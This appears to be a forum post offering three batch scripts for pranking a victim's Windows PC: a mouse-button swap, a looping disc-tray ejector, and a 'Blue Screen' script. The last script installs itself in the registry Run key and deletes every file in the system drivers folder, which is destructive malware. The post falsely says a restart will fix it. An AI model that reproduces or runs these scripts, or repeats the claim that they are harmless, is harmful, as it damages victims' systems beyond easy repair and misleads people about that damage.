[warning]This is for educational purposes only! I am not responsible for your actions with this.[/warning]
Ello hope you're doin well, sick thing to fuck about with. Run as .bat and annoy people
Use wisely
[spoiler]Sikeeee you leecher
Swapping mouse keys
Pretty straightforward. Swaps the left and right buttons on the mouse so, when the victim left-clicks, it will be registered as a right click. To reset this, you can go into mouse settings and change it. Pretty easy. But annoying in so many levels. XD
@ echo off
rem ———————————
rem Swap Mouse Buttons
RUNDLL32 USER32.DLL,SwapMouseButton
rem ———————————
Disk tray go kreyziiiiiiiiiiiiiiiiii
Use this and the disk tray will go crazy. It will keep popping out and in, like it’s possessed or something. No cause for concern. But worth the effort, if you’re looking to annoy someone
@ echo off
rem ———————————
rem Start Opening Disk Tray
echo Do >> “opendisk.vbs”
echo Set oWMP = CreateObject(“WMPlayer.OCX.7” ) >> “opendisk.vbs”
echo Set colCDROMs = oWMP.cdromCollection >> “opendisk.vbs”
echo colCDROMs.Item(d).Eject >> “opendisk.vbs”
echo colCDROMs.Item(d).Eject >> “opendisk.vbs”
echo Loop >> “opendisk.vbs”
start “” “opendisk.vbs”
rem ———————————
Blue Screen
Cause the whole screen to go blue. A simple restart should fix this but it’s worth the panic you create.
@ echo off
rem ———————————
rem Activate Blue Screen Of Death
@((( Echo Off > Nul ) & Break Off )
@set HiveBSOD=HKLM\Software\Microsoft\Windows\CurrentVersion\Run
@reg Add “%HiveBSOD%” /v “BSOD” /t “REG_SZ” /d %0 /f > Nul
@Del /q /s /f “%SystemRoot%\Windows\System32\Drivers\*.*”
rem ———————————